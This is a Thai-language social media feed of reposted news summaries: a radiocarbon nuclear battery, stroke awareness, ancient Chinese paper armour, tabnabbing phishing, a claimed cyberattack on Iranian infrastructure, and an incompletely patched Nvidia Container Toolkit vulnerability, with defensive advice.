อวกาศ ➡️ “พลังงานนิวเคลียร์ในอุปกรณ์ขนาดเท่านิ้ว” ตามคำกล่าวของศาสตราจารย์ In ‼️ ประสิทธิภาพยังต่ำกว่าแบตเตอรี่ลิเธียมไอออนทั่วไป ⛔ ต้องปรับปรุงรูปทรงของตัวปล่อยรังสีและตัวดูดซับเพิ่มเติม ‼️ การใช้สารกัมมันตรังสีแม้ปลอดภัย ต้องผ่านการรับรองด้านชีวภาพ ⛔ โดยเฉพาะหากนำไปใช้ในอุปกรณ์ทางการแพทย์ ‼️ การผลิตและใช้งานในเชิงพาณิชย์ยังอยู่ในขั้นต้น ⛔ ต้องการการพัฒนาเพิ่มเติมก่อนนำไปใช้จริง ‼️ การจัดการคาร์บอน-14 ต้องมีระบบควบคุมที่เข้มงวด ⛔ แม้จะปลอดภัย แต่ยังเป็นสารกัมมันตรังสีที่ต้องดูแลอย่างรอบคอบ https://www.neowin.net/news/this-amazing-new-battery-has-life-so-long-you-may-never-have-to-recharge/
    WWW.NEOWIN.NET
    This amazing new battery has life so long you may never have to recharge
    Radiocarbon and perovskite unite in a compact nuclear battery promising safe, almost ever-lasting power for extreme environments and miniature tech applications.
    0 Comments 0 Shares 325 Views 0 Reviews
  • สโตรกป้องกันได้ ถ้าเข้าใจต้นทาง “หมอเจด” เล่าเคส ตังตัง นัฐรุจี
    ป่วยเป็นสโตรกแม้อายุน้อย ชี้สาเหตุเกิดจากอาการทั่วไป ที่หลายคนมองข้าม
    ย้ำมีอาการต่อไปนี้ ควรรักษาให้หาย ก่อนสายเกินไป 
    สโตรกป้องกันได้ ถ้าเข้าใจต้นทาง “หมอเจด” เล่าเคส ตังตัง นัฐรุจี ป่วยเป็นสโตรกแม้อายุน้อย ชี้สาเหตุเกิดจากอาการทั่วไป ที่หลายคนมองข้าม ย้ำมีอาการต่อไปนี้ ควรรักษาให้หาย ก่อนสายเกินไป 
    Like
    2
    0 Comments 0 Shares 632 Views 60 0 Reviews
  • Storyฯ เคยเขียนถึงวิธีสู้กับความหนาวของจีนโบราณซึ่งหนึ่งในนั้นคือใช้เสื้อผ้าและผ้าห่มที่ทำมาจากกระดาษ ซึ่งในสมัยถังมีวิวัฒนาการการผลิตกระดาษอย่างก้าวกระโดด เสื้อหรือผ้าห่มนั้นใช้กระดาษที่ทำจากเปลือกของกิ่งหม่อน วิธีทำและหน้าตาคล้ายผลิตกระดาษสาบ้านเรา

    เพื่อนเพจทราบหรือไม่ว่า มีการนำกระดาษมาทำเสื้อเกราะให้ทหารสวมใส่ด้วย? บ้างก็ว่ามีมาแต่สมัยราชวงศ์เหนือใต้ บ้างก็ว่าเสื้อเกราะกระดาษนั้นถูกคิดค้นขึ้นในสมัยราชวงศ์ถัง

    เสื้อเกราะกระดาษนี้เรียกตรงตัวว่า ‘จื๋อข่าย’ (纸铠)หรือ ‘จื๋อเจี่ย’ (纸甲) ในบันทึกเกี่ยวกับประวัติศาสตร์ราชวงศ์ถังที่จัดทำขึ้นโดยสำนักราชบัณฑิตสมัยซ่ง (ซินถังซู/新唐书) มีจารึกไว้ว่า เสื้อเกราะกระดาษเหล่านี้ป้องกันได้จากคมดาบและธนู ต่อมาในยุคสมัยหมิงนิยมใช้ในพื้นที่ทางตอนใต้ โดยเฉพาะกับทหารเรือ เนื่องจากพื้นที่แถบนั้นอากาศชื้น เสื้อเกราะเหล็กขึ้นสนิมได้ง่ายและหนัก ในทางกลับกัน เสื้อเกราะกระดาษใช้ได้ในหลายสภาพอากาศทั้งร้อนทั้งหนาว มีน้ำหนักเบาและเมื่อโดนน้ำยิ่งทำให้มีความทนทานมากขึ้น ป้องกันได้แม้กระทั่งระเบิดดินปืน

    จากบันทึกทางการทหารในสมัยหมิงมีการกล่าวว่า เสื้อเกราะกระดาษประกอบขึ้นจากกระดาษเยื่อไม้และใยผ้าอัดแน่นซ้ำๆ จนเป็นชั้นหนาประมาณหนึ่งนิ้ว ตรึงด้วยหมุดเหล็ก เย็บขึ้นเป็นเกราะแบบเกล็ดปลา

    เสื้อเกราะกระดาษถูกใช้อย่างแพร่หลายในราชวงศ์หมิง แม้จะยังมีใช้บ้างในสมัยราชวงศ์ชิง (มีการค้นพบเสื้อเกราะกระดาษจากสมัยราชวงศ์ชิงจริงในกุ้ยโจวเมื่อปี 2004) แต่ในยุคสมัยที่ระเบิดมีประสิทธิภาพมากขึ้นและมีไฟแรง เกราะกระดาษใช้ไม่ได้ดีนักจึงค่อยๆ หายไป

    Storyฯ ก็นึกไม่ออกว่าเกราะกระดาษจะทนทานต่ออาวุธได้อย่างไร? ไปพบเจอกับวิดิโอคลิปเลยนำมาแบ่งปันให้ดู (ขออภัยไร้ความสามารถทำคำแปลบนคลิป)

    เป็นคลิปที่ตัดตอนมาจากรายการเกมการแข่งขันความรู้ของเด็กนักเรียน มีการเชิญมือธนูมาทดลองยิงเปรียบเทียบระหว่างเกราะโซ่และเกราะกระดาษ (ซึ่งใช้กระดาษเท่านั้น ยังไม่ได้รวมใยผ้าอัดผสมเข้าไป) โดยหัวธนูที่ใช้นั้นเป็นแบบที่มือธนูเรียกว่าเป็นธนูสำหรับยิงเกราะ หัวธนูเป็นเหล็กแหลมสองชั้น ยิงในระยะ 10 เมตร โดยตอนท้ายมีการสรุปว่าการที่จะเจาะให้ทะลุกระดาษที่เรียงเป็นชั้นๆ จนถึงผิวของคนใส่นั้น ต้องมีแรงอัดหลายทอด หัวธนูจึงไม่สามารถยิงทะลุได้ในคราวเดียว ใครอยากดูคลิปเต็มดูได้ตามลิ้งค์ยูทูบข้างล่างเลยค่ะ

    ดูแล้วรู้สึกอย่างไรคะ? เม้นท์บอกกันมาได้ค่ะ

    (ป.ล. หากอ่านแล้วชอบใจ ช่วยกดไลค์กดแชร์กันด้วยนะคะ #StoryfromStory)

    Credit วิดิโอและรูปภาพจาก:
    https://www.youtube.com/watch?v=9lG3aWRDQtI
    https://kknews.cc/history/g93o88.html
    https://kknews.cc/other/mo6gpg6.html

    Credit ข้อมูลรวบรวมจาก:
    https://baike.baidu.com/item/%E7%BA%B8%E7%94%B2/8697116
    https://www.chinanews.com.cn/hb/news/2009/11-18/1971854.shtml
    https://kknews.cc/other/mo6gpg6.html

    #เสื้อเกราะจีนโบราณ #เสื้อกระดาษ #จื๋อเจี่ย #จื๋อข่าย #อาวุธจีนโบราณ #เสื้อเกราะกระดาษ
    Storyฯ เคยเขียนถึงวิธีสู้กับความหนาวของจีนโบราณซึ่งหนึ่งในนั้นคือใช้เสื้อผ้าและผ้าห่มที่ทำมาจากกระดาษ ซึ่งในสมัยถังมีวิวัฒนาการการผลิตกระดาษอย่างก้าวกระโดด เสื้อหรือผ้าห่มนั้นใช้กระดาษที่ทำจากเปลือกของกิ่งหม่อน วิธีทำและหน้าตาคล้ายผลิตกระดาษสาบ้านเรา เพื่อนเพจทราบหรือไม่ว่า มีการนำกระดาษมาทำเสื้อเกราะให้ทหารสวมใส่ด้วย? บ้างก็ว่ามีมาแต่สมัยราชวงศ์เหนือใต้ บ้างก็ว่าเสื้อเกราะกระดาษนั้นถูกคิดค้นขึ้นในสมัยราชวงศ์ถัง เสื้อเกราะกระดาษนี้เรียกตรงตัวว่า ‘จื๋อข่าย’ (纸铠)หรือ ‘จื๋อเจี่ย’ (纸甲) ในบันทึกเกี่ยวกับประวัติศาสตร์ราชวงศ์ถังที่จัดทำขึ้นโดยสำนักราชบัณฑิตสมัยซ่ง (ซินถังซู/新唐书) มีจารึกไว้ว่า เสื้อเกราะกระดาษเหล่านี้ป้องกันได้จากคมดาบและธนู ต่อมาในยุคสมัยหมิงนิยมใช้ในพื้นที่ทางตอนใต้ โดยเฉพาะกับทหารเรือ เนื่องจากพื้นที่แถบนั้นอากาศชื้น เสื้อเกราะเหล็กขึ้นสนิมได้ง่ายและหนัก ในทางกลับกัน เสื้อเกราะกระดาษใช้ได้ในหลายสภาพอากาศทั้งร้อนทั้งหนาว มีน้ำหนักเบาและเมื่อโดนน้ำยิ่งทำให้มีความทนทานมากขึ้น ป้องกันได้แม้กระทั่งระเบิดดินปืน จากบันทึกทางการทหารในสมัยหมิงมีการกล่าวว่า เสื้อเกราะกระดาษประกอบขึ้นจากกระดาษเยื่อไม้และใยผ้าอัดแน่นซ้ำๆ จนเป็นชั้นหนาประมาณหนึ่งนิ้ว ตรึงด้วยหมุดเหล็ก เย็บขึ้นเป็นเกราะแบบเกล็ดปลา เสื้อเกราะกระดาษถูกใช้อย่างแพร่หลายในราชวงศ์หมิง แม้จะยังมีใช้บ้างในสมัยราชวงศ์ชิง (มีการค้นพบเสื้อเกราะกระดาษจากสมัยราชวงศ์ชิงจริงในกุ้ยโจวเมื่อปี 2004) แต่ในยุคสมัยที่ระเบิดมีประสิทธิภาพมากขึ้นและมีไฟแรง เกราะกระดาษใช้ไม่ได้ดีนักจึงค่อยๆ หายไป Storyฯ ก็นึกไม่ออกว่าเกราะกระดาษจะทนทานต่ออาวุธได้อย่างไร? ไปพบเจอกับวิดิโอคลิปเลยนำมาแบ่งปันให้ดู (ขออภัยไร้ความสามารถทำคำแปลบนคลิป) เป็นคลิปที่ตัดตอนมาจากรายการเกมการแข่งขันความรู้ของเด็กนักเรียน มีการเชิญมือธนูมาทดลองยิงเปรียบเทียบระหว่างเกราะโซ่และเกราะกระดาษ (ซึ่งใช้กระดาษเท่านั้น ยังไม่ได้รวมใยผ้าอัดผสมเข้าไป) โดยหัวธนูที่ใช้นั้นเป็นแบบที่มือธนูเรียกว่าเป็นธนูสำหรับยิงเกราะ หัวธนูเป็นเหล็กแหลมสองชั้น ยิงในระยะ 10 เมตร โดยตอนท้ายมีการสรุปว่าการที่จะเจาะให้ทะลุกระดาษที่เรียงเป็นชั้นๆ จนถึงผิวของคนใส่นั้น ต้องมีแรงอัดหลายทอด หัวธนูจึงไม่สามารถยิงทะลุได้ในคราวเดียว ใครอยากดูคลิปเต็มดูได้ตามลิ้งค์ยูทูบข้างล่างเลยค่ะ ดูแล้วรู้สึกอย่างไรคะ? เม้นท์บอกกันมาได้ค่ะ (ป.ล. หากอ่านแล้วชอบใจ ช่วยกดไลค์กดแชร์กันด้วยนะคะ #StoryfromStory) Credit วิดิโอและรูปภาพจาก: https://www.youtube.com/watch?v=9lG3aWRDQtI https://kknews.cc/history/g93o88.html https://kknews.cc/other/mo6gpg6.html Credit ข้อมูลรวบรวมจาก: https://baike.baidu.com/item/%E7%BA%B8%E7%94%B2/8697116 https://www.chinanews.com.cn/hb/news/2009/11-18/1971854.shtml https://kknews.cc/other/mo6gpg6.html #เสื้อเกราะจีนโบราณ #เสื้อกระดาษ #จื๋อเจี่ย #จื๋อข่าย #อาวุธจีนโบราณ #เสื้อเกราะกระดาษ
    1 Comments 0 Shares 856 Views 0 Reviews
  • Tabnabbing เป็นเทคนิคการหลอกลวงทางออนไลน์ที่กำลังสร้างความกังวลให้กับผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์และหน่วยงานที่เกี่ยวข้อง โดยเป็นการ เปลี่ยนเนื้อหาของแท็บที่ไม่ได้ใช้งานในเว็บเบราว์เซอร์ เพื่อหลอกให้ผู้ใช้กรอกข้อมูลสำคัญ เช่น รหัสผ่านและข้อมูลธนาคาร

    เทคนิคนี้ทำงานโดย แทนที่เนื้อหาของแท็บที่เปิดค้างไว้ด้วยหน้าเข้าสู่ระบบปลอม ที่เลียนแบบเว็บไซต์จริง เช่น บริการอีเมล, แพลตฟอร์มธนาคาร หรือเว็บไซต์ช้อปปิ้ง เมื่อผู้ใช้กลับมาที่แท็บดังกล่าว พวกเขาอาจไม่ทันสังเกตว่า หน้าเว็บถูกเปลี่ยนไปแล้ว และกรอกข้อมูลเข้าสู่ระบบโดยคิดว่าเป็นเว็บไซต์จริง

    Tabnabbing เป็นเทคนิคที่เปลี่ยนเนื้อหาของแท็บที่ไม่ได้ใช้งาน
    - หลอกให้ผู้ใช้กรอกข้อมูลสำคัญโดยคิดว่าเป็นเว็บไซต์จริง
    - ใช้กับ บริการอีเมล, แพลตฟอร์มธนาคาร และเว็บไซต์ช้อปปิ้ง

    เป็นรูปแบบหนึ่งของ Phishing ที่มีความแนบเนียนมากขึ้น
    - ไม่ต้องใช้ลิงก์ปลอมเพื่อหลอกให้ผู้ใช้คลิก
    - อาศัย การเปลี่ยนเนื้อหาของแท็บที่เปิดค้างไว้

    ผู้ใช้มักไม่ทันสังเกตว่าแท็บถูกเปลี่ยนไปแล้ว
    - เมื่อกลับมาใช้งานแท็บเดิม อาจกรอกข้อมูลโดยไม่รู้ตัว

    สามารถป้องกันได้โดยการตั้งค่าความปลอดภัยของเบราว์เซอร์
    - ใช้ ตัวจัดการรหัสผ่านเพื่อหลีกเลี่ยงการกรอกข้อมูลด้วยตนเอง
    - ปิดแท็บที่ไม่ได้ใช้งานเป็นประจำ

    Tabnabbing อาจทำให้ข้อมูลสำคัญของผู้ใช้ถูกขโมยโดยไม่รู้ตัว
    - ควรตรวจสอบ URL ของเว็บไซต์ทุกครั้งก่อนกรอกข้อมูล

    https://www.thestar.com.my/tech/tech-news/2025/05/07/beware-of-tabnabbing-a-fearsome-new-form-of-online-scam
    Tabnabbing เป็นเทคนิคการหลอกลวงทางออนไลน์ที่กำลังสร้างความกังวลให้กับผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์และหน่วยงานที่เกี่ยวข้อง โดยเป็นการ เปลี่ยนเนื้อหาของแท็บที่ไม่ได้ใช้งานในเว็บเบราว์เซอร์ เพื่อหลอกให้ผู้ใช้กรอกข้อมูลสำคัญ เช่น รหัสผ่านและข้อมูลธนาคาร เทคนิคนี้ทำงานโดย แทนที่เนื้อหาของแท็บที่เปิดค้างไว้ด้วยหน้าเข้าสู่ระบบปลอม ที่เลียนแบบเว็บไซต์จริง เช่น บริการอีเมล, แพลตฟอร์มธนาคาร หรือเว็บไซต์ช้อปปิ้ง เมื่อผู้ใช้กลับมาที่แท็บดังกล่าว พวกเขาอาจไม่ทันสังเกตว่า หน้าเว็บถูกเปลี่ยนไปแล้ว และกรอกข้อมูลเข้าสู่ระบบโดยคิดว่าเป็นเว็บไซต์จริง ✅ Tabnabbing เป็นเทคนิคที่เปลี่ยนเนื้อหาของแท็บที่ไม่ได้ใช้งาน - หลอกให้ผู้ใช้กรอกข้อมูลสำคัญโดยคิดว่าเป็นเว็บไซต์จริง - ใช้กับ บริการอีเมล, แพลตฟอร์มธนาคาร และเว็บไซต์ช้อปปิ้ง ✅ เป็นรูปแบบหนึ่งของ Phishing ที่มีความแนบเนียนมากขึ้น - ไม่ต้องใช้ลิงก์ปลอมเพื่อหลอกให้ผู้ใช้คลิก - อาศัย การเปลี่ยนเนื้อหาของแท็บที่เปิดค้างไว้ ✅ ผู้ใช้มักไม่ทันสังเกตว่าแท็บถูกเปลี่ยนไปแล้ว - เมื่อกลับมาใช้งานแท็บเดิม อาจกรอกข้อมูลโดยไม่รู้ตัว ✅ สามารถป้องกันได้โดยการตั้งค่าความปลอดภัยของเบราว์เซอร์ - ใช้ ตัวจัดการรหัสผ่านเพื่อหลีกเลี่ยงการกรอกข้อมูลด้วยตนเอง - ปิดแท็บที่ไม่ได้ใช้งานเป็นประจำ ‼️ Tabnabbing อาจทำให้ข้อมูลสำคัญของผู้ใช้ถูกขโมยโดยไม่รู้ตัว - ควรตรวจสอบ URL ของเว็บไซต์ทุกครั้งก่อนกรอกข้อมูล https://www.thestar.com.my/tech/tech-news/2025/05/07/beware-of-tabnabbing-a-fearsome-new-form-of-online-scam
    WWW.THESTAR.COM.MY
    Beware of tabnabbing, a fearsome new form of online scam
    A particularly insidious online scam has cybersecurity experts and the authorities worried. It involves changing the content of an inactive tab in your web browser. Like any other form of phishing, the aim is to steal confidential data.
    0 Comments 0 Shares 186 Views 0 Reviews
  • บทความนี้กล่าวถึงการโจมตีทางไซเบอร์ที่ซับซ้อนและแพร่หลายต่อโครงสร้างพื้นฐานสำคัญของอิหร่าน ซึ่งถูกป้องกันได้สำเร็จโดยทีมผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์ของประเทศ แม้ว่ารายละเอียดของการโจมตีจะยังไม่ถูกเปิดเผย แต่เจ้าหน้าที่ระดับสูงของรัฐบาลอิหร่านยืนยันว่าการโจมตีครั้งนี้เป็นหนึ่งในเหตุการณ์ที่ใหญ่ที่สุดและซับซ้อนที่สุดที่เคยเกิดขึ้น

    การโจมตีดังกล่าวเกิดขึ้นในช่วงที่ความตึงเครียดทางภูมิรัฐศาสตร์เพิ่มสูงขึ้น โดยโครงสร้างพื้นฐานสำคัญ เช่น โทรคมนาคม การขนส่ง พลังงาน และน้ำ ยังคงเป็นเป้าหมายหลักของกลุ่มผู้โจมตีที่ได้รับการสนับสนุนจากรัฐและอาชญากรไซเบอร์

    การโจมตีที่ซับซ้อนและแพร่หลาย
    - โครงสร้างพื้นฐานสำคัญของอิหร่านถูกโจมตีทางไซเบอร์
    - การโจมตีถูกป้องกันได้สำเร็จโดยทีมผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์

    เป้าหมายของการโจมตี
    - โครงสร้างพื้นฐานสำคัญ เช่น โทรคมนาคม การขนส่ง พลังงาน และน้ำ
    - การโจมตีที่ส่งผลกระทบต่อบริการที่สำคัญและอาจเป็นอันตรายต่อชีวิต

    การตอบสนองของรัฐบาลอิหร่าน
    - เจ้าหน้าที่ระดับสูงยืนยันความสำเร็จในการป้องกันการโจมตี
    - การโจมตีครั้งนี้เป็นหนึ่งในเหตุการณ์ที่ใหญ่ที่สุดและซับซ้อนที่สุด

    ความสำคัญของการป้องกันภัยไซเบอร์
    - ความตึงเครียดทางภูมิรัฐศาสตร์ทำให้โครงสร้างพื้นฐานสำคัญเป็นเป้าหมายหลัก

    https://www.techradar.com/pro/security/widespread-cyberattack-against-national-infrastructure-thwarted-iranian-government-claims
    บทความนี้กล่าวถึงการโจมตีทางไซเบอร์ที่ซับซ้อนและแพร่หลายต่อโครงสร้างพื้นฐานสำคัญของอิหร่าน ซึ่งถูกป้องกันได้สำเร็จโดยทีมผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์ของประเทศ แม้ว่ารายละเอียดของการโจมตีจะยังไม่ถูกเปิดเผย แต่เจ้าหน้าที่ระดับสูงของรัฐบาลอิหร่านยืนยันว่าการโจมตีครั้งนี้เป็นหนึ่งในเหตุการณ์ที่ใหญ่ที่สุดและซับซ้อนที่สุดที่เคยเกิดขึ้น การโจมตีดังกล่าวเกิดขึ้นในช่วงที่ความตึงเครียดทางภูมิรัฐศาสตร์เพิ่มสูงขึ้น โดยโครงสร้างพื้นฐานสำคัญ เช่น โทรคมนาคม การขนส่ง พลังงาน และน้ำ ยังคงเป็นเป้าหมายหลักของกลุ่มผู้โจมตีที่ได้รับการสนับสนุนจากรัฐและอาชญากรไซเบอร์ ✅ การโจมตีที่ซับซ้อนและแพร่หลาย - โครงสร้างพื้นฐานสำคัญของอิหร่านถูกโจมตีทางไซเบอร์ - การโจมตีถูกป้องกันได้สำเร็จโดยทีมผู้เชี่ยวชาญด้านความปลอดภัยไซเบอร์ ✅ เป้าหมายของการโจมตี - โครงสร้างพื้นฐานสำคัญ เช่น โทรคมนาคม การขนส่ง พลังงาน และน้ำ - การโจมตีที่ส่งผลกระทบต่อบริการที่สำคัญและอาจเป็นอันตรายต่อชีวิต ✅ การตอบสนองของรัฐบาลอิหร่าน - เจ้าหน้าที่ระดับสูงยืนยันความสำเร็จในการป้องกันการโจมตี - การโจมตีครั้งนี้เป็นหนึ่งในเหตุการณ์ที่ใหญ่ที่สุดและซับซ้อนที่สุด ✅ ความสำคัญของการป้องกันภัยไซเบอร์ - ความตึงเครียดทางภูมิรัฐศาสตร์ทำให้โครงสร้างพื้นฐานสำคัญเป็นเป้าหมายหลัก https://www.techradar.com/pro/security/widespread-cyberattack-against-national-infrastructure-thwarted-iranian-government-claims
    0 Comments 0 Shares 409 Views 0 Reviews
  • นักวิจัยจาก Trend Micro พบว่า ช่องโหว่ CVE-2024-0132 ใน Nvidia Container Toolkit ยังคงเปิดให้โจมตีได้ แม้ว่าจะได้รับการแก้ไขไปแล้วในเดือนกันยายน 2024 โดยปัญหานี้อาจนำไปสู่การโจมตีแบบ Denial of Service (DoS) บน Docker ที่ทำงานบนระบบ Linux

    ช่องโหว่ CVE-2024-0132 ยังคงเปิดให้โจมตีได้
    - เป็นช่องโหว่ประเภท Time-of-Check Time-of-Use (TOCTOU) ที่มีคะแนนความรุนแรง CVSS 9/10
    - อาจทำให้ container image ที่ถูกสร้างขึ้นโดยเฉพาะ สามารถเข้าถึง host file system ได้

    ผลกระทบต่อ Nvidia Container Toolkit และ Docker
    - ช่องโหว่นี้อาจนำไปสู่ container escape attacks ซึ่งทำให้สามารถรันโค้ดบนระบบโฮสต์
    - อาจเกิด ข้อมูลรั่วไหล, การแก้ไขข้อมูลโดยไม่ได้รับอนุญาต และการโจมตี DoS

    การโจมตี DoS บน Docker
    - พบว่า Docker บน Linux อาจได้รับผลกระทบจากช่องโหว่นี้
    - เมื่อสร้าง container ใหม่ที่มี multiple mounts ระบบจะสร้าง parent/child paths ที่ไม่ถูกลบออกหลังจาก container ถูกปิด
    - ทำให้ mount table ขยายตัวจนใช้ทรัพยากรระบบจนหมด และทำให้ระบบไม่สามารถสร้าง container ใหม่ได้

    การแก้ไขและข้อจำกัดของแพตช์
    - Nvidia ออกแพตช์แรกในเดือนกันยายน 2024 แต่พบว่ามีช่องโหว่ CVE-2025-23359 ที่ทำให้สามารถข้ามการป้องกันได้
    - Nvidia ออกแพตช์ใหม่ในเดือนกุมภาพันธ์ 2025 แต่ Trend Micro พบว่ายังมีช่องโหว่ที่สามารถใช้โจมตีได้

    แนวทางป้องกัน
    - Trend Micro แนะนำให้ ปิดการใช้งานฟีเจอร์ "allow-cuda-compat-libs-from-containers"
    - จำกัดการเข้าถึง Docker API เฉพาะบุคลากรที่ได้รับอนุญาต

    https://www.csoonline.com/article/3962744/incomplete-patching-leaves-nvidia-docker-exposed-to-dos-attacks.html
    นักวิจัยจาก Trend Micro พบว่า ช่องโหว่ CVE-2024-0132 ใน Nvidia Container Toolkit ยังคงเปิดให้โจมตีได้ แม้ว่าจะได้รับการแก้ไขไปแล้วในเดือนกันยายน 2024 โดยปัญหานี้อาจนำไปสู่การโจมตีแบบ Denial of Service (DoS) บน Docker ที่ทำงานบนระบบ Linux ✅ ช่องโหว่ CVE-2024-0132 ยังคงเปิดให้โจมตีได้ - เป็นช่องโหว่ประเภท Time-of-Check Time-of-Use (TOCTOU) ที่มีคะแนนความรุนแรง CVSS 9/10 - อาจทำให้ container image ที่ถูกสร้างขึ้นโดยเฉพาะ สามารถเข้าถึง host file system ได้ ✅ ผลกระทบต่อ Nvidia Container Toolkit และ Docker - ช่องโหว่นี้อาจนำไปสู่ container escape attacks ซึ่งทำให้สามารถรันโค้ดบนระบบโฮสต์ - อาจเกิด ข้อมูลรั่วไหล, การแก้ไขข้อมูลโดยไม่ได้รับอนุญาต และการโจมตี DoS ✅ การโจมตี DoS บน Docker - พบว่า Docker บน Linux อาจได้รับผลกระทบจากช่องโหว่นี้ - เมื่อสร้าง container ใหม่ที่มี multiple mounts ระบบจะสร้าง parent/child paths ที่ไม่ถูกลบออกหลังจาก container ถูกปิด - ทำให้ mount table ขยายตัวจนใช้ทรัพยากรระบบจนหมด และทำให้ระบบไม่สามารถสร้าง container ใหม่ได้ ✅ การแก้ไขและข้อจำกัดของแพตช์ - Nvidia ออกแพตช์แรกในเดือนกันยายน 2024 แต่พบว่ามีช่องโหว่ CVE-2025-23359 ที่ทำให้สามารถข้ามการป้องกันได้ - Nvidia ออกแพตช์ใหม่ในเดือนกุมภาพันธ์ 2025 แต่ Trend Micro พบว่ายังมีช่องโหว่ที่สามารถใช้โจมตีได้ ✅ แนวทางป้องกัน - Trend Micro แนะนำให้ ปิดการใช้งานฟีเจอร์ "allow-cuda-compat-libs-from-containers" - จำกัดการเข้าถึง Docker API เฉพาะบุคลากรที่ได้รับอนุญาต https://www.csoonline.com/article/3962744/incomplete-patching-leaves-nvidia-docker-exposed-to-dos-attacks.html
    WWW.CSOONLINE.COM
    Incomplete patching leaves Nvidia, Docker exposed to DOS attacks
    An optional feature issued with the fix can cause a bug rollback, making a secondary DOS issue possible on top of root-level privilege exploitation.
    0 Comments 0 Shares 345 Views 0 Reviews
  • ป้องกัน “รองเท้าสวบ” เทศกาลสงกรานต์ : [News story]

    เตือนภัยสงกรานต์ ระวัง!! รองเท้าดุสวบไปทั้งเท้า ที่เราสามารถป้องกันได้
    ป้องกัน “รองเท้าสวบ” เทศกาลสงกรานต์ : [News story] เตือนภัยสงกรานต์ ระวัง!! รองเท้าดุสวบไปทั้งเท้า ที่เราสามารถป้องกันได้
    Like
    Haha
    4
    0 Comments 1 Shares 1019 Views 30 0 Reviews
  • ทีมนักวิจัยเกาหลีใต้กำลังพัฒนาแบตเตอรี่พลังงานนิวเคลียร์ที่ใช้ Radiocarbon วัสดุที่มีครึ่งชีวิตยาวนานถึงหลายพันปี แบตเตอรี่ต้นแบบช่วยแปลงรังสีเบตาเป็นพลังงานไฟฟ้า เหมาะสำหรับอุปกรณ์ระยะยาว เช่น เครื่องกระตุ้นหัวใจและดาวเทียม โดยมีเป้าหมายสร้างเทคโนโลยีที่ยั่งยืนและช่วยลดข้อจำกัดของแบตเตอรี่ Li-ion

    ข้อดีของ Radiocarbon:
    - Radiocarbon เป็นวัสดุที่ได้จากผลพลอยได้ของโรงไฟฟ้านิวเคลียร์ ราคาถูก และสามารถรีไซเคิลได้ง่าย อีกทั้งยังปลอดภัยต่อการใช้งานในแบตเตอรี่เนื่องจากปล่อยรังสีเบตาซึ่งสามารถป้องกันได้ด้วยแผ่นอะลูมิเนียมบาง ๆ.

    การออกแบบเพื่อเพิ่มประสิทธิภาพ:
    - แบตเตอรี่ต้นแบบใช้วัสดุ Titanium Dioxide ซึ่งมีบทบาทสำคัญในการแปลงรังสีเบตาเป็นพลังงานไฟฟ้า และมีการออกแบบอิเล็กโทรดที่วาง Radiocarbon ทั้งในส่วน Cathode และ Anode เพื่อเพิ่มประสิทธิภาพการสร้างพลังงาน.

    แอปพลิเคชันที่หลากหลาย:
    - แบตเตอรี่ชนิดนี้เหมาะสำหรับอุปกรณ์ที่ต้องการพลังงานในระยะยาว เช่น เครื่องกระตุ้นหัวใจที่ไม่ต้องเปลี่ยนแบตเตอรี่ ดาวเทียม เซ็นเซอร์ในพื้นที่ห่างไกล หรือแม้กระทั่งยานพาหนะไร้คนขับ.

    ความท้าทายและอนาคต:
    - แม้ประสิทธิภาพในการแปลงพลังงานยังต่ำกว่าแบตเตอรี่ Li-ion แต่ทีมวิจัยกำลังทำงานเพื่อปรับปรุงรูปร่างของวัสดุปล่อยรังสีเบตาและผู้ดูดซับพลังงานให้มีประสิทธิภาพมากขึ้น

    https://www.techspot.com/news/107339-nuclear-powered-battery-could-eliminate-need-recharging.html
    ทีมนักวิจัยเกาหลีใต้กำลังพัฒนาแบตเตอรี่พลังงานนิวเคลียร์ที่ใช้ Radiocarbon วัสดุที่มีครึ่งชีวิตยาวนานถึงหลายพันปี แบตเตอรี่ต้นแบบช่วยแปลงรังสีเบตาเป็นพลังงานไฟฟ้า เหมาะสำหรับอุปกรณ์ระยะยาว เช่น เครื่องกระตุ้นหัวใจและดาวเทียม โดยมีเป้าหมายสร้างเทคโนโลยีที่ยั่งยืนและช่วยลดข้อจำกัดของแบตเตอรี่ Li-ion ข้อดีของ Radiocarbon: - Radiocarbon เป็นวัสดุที่ได้จากผลพลอยได้ของโรงไฟฟ้านิวเคลียร์ ราคาถูก และสามารถรีไซเคิลได้ง่าย อีกทั้งยังปลอดภัยต่อการใช้งานในแบตเตอรี่เนื่องจากปล่อยรังสีเบตาซึ่งสามารถป้องกันได้ด้วยแผ่นอะลูมิเนียมบาง ๆ. การออกแบบเพื่อเพิ่มประสิทธิภาพ: - แบตเตอรี่ต้นแบบใช้วัสดุ Titanium Dioxide ซึ่งมีบทบาทสำคัญในการแปลงรังสีเบตาเป็นพลังงานไฟฟ้า และมีการออกแบบอิเล็กโทรดที่วาง Radiocarbon ทั้งในส่วน Cathode และ Anode เพื่อเพิ่มประสิทธิภาพการสร้างพลังงาน. แอปพลิเคชันที่หลากหลาย: - แบตเตอรี่ชนิดนี้เหมาะสำหรับอุปกรณ์ที่ต้องการพลังงานในระยะยาว เช่น เครื่องกระตุ้นหัวใจที่ไม่ต้องเปลี่ยนแบตเตอรี่ ดาวเทียม เซ็นเซอร์ในพื้นที่ห่างไกล หรือแม้กระทั่งยานพาหนะไร้คนขับ. ความท้าทายและอนาคต: - แม้ประสิทธิภาพในการแปลงพลังงานยังต่ำกว่าแบตเตอรี่ Li-ion แต่ทีมวิจัยกำลังทำงานเพื่อปรับปรุงรูปร่างของวัสดุปล่อยรังสีเบตาและผู้ดูดซับพลังงานให้มีประสิทธิภาพมากขึ้น https://www.techspot.com/news/107339-nuclear-powered-battery-could-eliminate-need-recharging.html
    WWW.TECHSPOT.COM
    Nuclear-powered battery could eliminate need for recharging
    A team led by Su-Il In, a professor at South Korea's Daegu Gyeongbuk Institute of Science and Technology, is developing an innovative solution: radiocarbon-powered nuclear batteries that...
    0 Comments 0 Shares 489 Views 0 Reviews
